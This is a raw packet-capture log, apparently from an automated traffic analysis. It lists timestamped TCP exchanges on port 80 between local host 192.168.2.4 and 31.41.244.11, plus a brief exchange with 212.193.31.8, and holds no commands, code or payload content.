                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.421269894 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.421293974 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.421312094 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.421329975 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.421344042 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.421562910 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.421600103 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.421984911 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.422022104 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.422080994 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.422097921 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.422135115 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.422332048 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.422822952 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.422863007 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.422863960 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.422879934 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.422899008 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.422920942 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.423156023 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.423190117 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.423655033 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.423671961 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.423686981 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.423691988 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.423702002 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.423722029 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.423883915 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.423921108 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.424380064 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.424413919 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.424432039 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.424448013 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.424470901 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.424480915 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.424695969 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.425215006 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.425230026 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.425246000 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.425255060 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.425276041 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.425297022 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.425443888 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.425925970 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.425966024 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.426008940 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.426026106 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.426064968 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.426350117 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.426795959 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.426812887 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.426829100 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.426832914 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.426841974 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.426866055 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.427016020 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.427479982 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.427515984 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.427575111 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.427589893 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.427625895 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.427823067 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.427858114 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.428278923 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.428406000 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.428421974 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.428446054 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.428463936 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.428694010 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.429059982 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.429100990 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.429145098 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.429158926 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.429197073 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.439240932 CET8049877212.193.31.8192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.442085981 CET4987780192.168.2.4212.193.31.8
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.452574015 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.452655077 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.452668905 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.452706099 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.452717066 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.452832937 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.452944040 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.452960014 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.452985048 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.453011990 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.453450918 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.453546047 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.453587055 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.602801085 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.602819920 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.602840900 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.602873087 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.602967978 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.602967978 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.603040934 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.603058100 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.603075027 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.603100061 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.603113890 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.603358984 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.603399038 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.603473902 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.603490114 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.603512049 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.603523016 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.603703976 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.603741884 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.604314089 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.604338884 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.604353905 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.604355097 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.604373932 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.604386091 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.604693890 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.604732037 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.604782104 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.604799032 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.604820013 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.604830027 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.604991913 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.605031967 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.605566978 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.605583906 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.605601072 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.605623960 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.605653048 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.605823040 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.606065035 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.606204987 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.606245041 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.606270075 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.606287003 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.606312037 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.606323004 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.606595993 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.606990099 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.607033968 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.607079983 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.607098103 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.607136965 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.607294083 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.607333899 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.607767105 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.607825041 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.607850075 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.607867002 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.607892036 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.607908964 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.608078957 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.608123064 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.608558893 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.608637094 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.608652115 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.608681917 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.608709097 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.608855963 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.609365940 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.609416008 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.609428883 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.609446049 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.609488010 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.609674931 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.609740973 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.610148907 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.610217094 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.610232115 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.610260963 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.610290051 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.610477924 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.610522032 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.610912085 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.610956907 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.610971928 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.610987902 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.611031055 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.611215115 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.611267090 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.611686945 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.611767054 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.611771107 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.611787081 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.611812115 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.611826897 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.612024069 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.612462997 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.612509966 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.612554073 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.612571001 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.612617016 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.612809896 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.612927914 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.613226891 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.613322973 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.613339901 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.613365889 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.613390923 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.613564968 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.613864899 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.614063025 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.614108086 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.614120007 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.614136934 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.614168882 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.614181042 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.614335060 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.614377975 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.614846945 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.614903927 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.614919901 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.614943981 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.614955902 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.615205050 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.615304947 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.615658998 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.615695000 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.615710020 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.615711927 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.615726948 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.615753889 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.615947008 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.616077900 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.616391897 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.616436005 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.616477966 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.616493940 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.616519928 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.616530895 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.616720915 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.617180109 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.617227077 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.617271900 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.617288113 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.617331028 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.617822886 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.617867947 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.618061066 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.618077040 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.618093967 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.618128061 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.618143082 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.618736982 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.618753910 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.618787050 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.618796110 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.618829012 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.618844986 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.618868113 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.618882895 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.619360924 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.619424105 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.619626045 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.619642019 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.619657993 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.619684935 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.619709969 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.620305061 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.620321035 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.620356083 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.620364904 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.620398045 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.620414972 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.620454073 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.621136904 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.621153116 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.621187925 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.621225119 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.621231079 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.621247053 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.621292114 CET4987280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.644994020 CET804987231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:52.645010948 CET804987231.41.244.11192.168.2.4
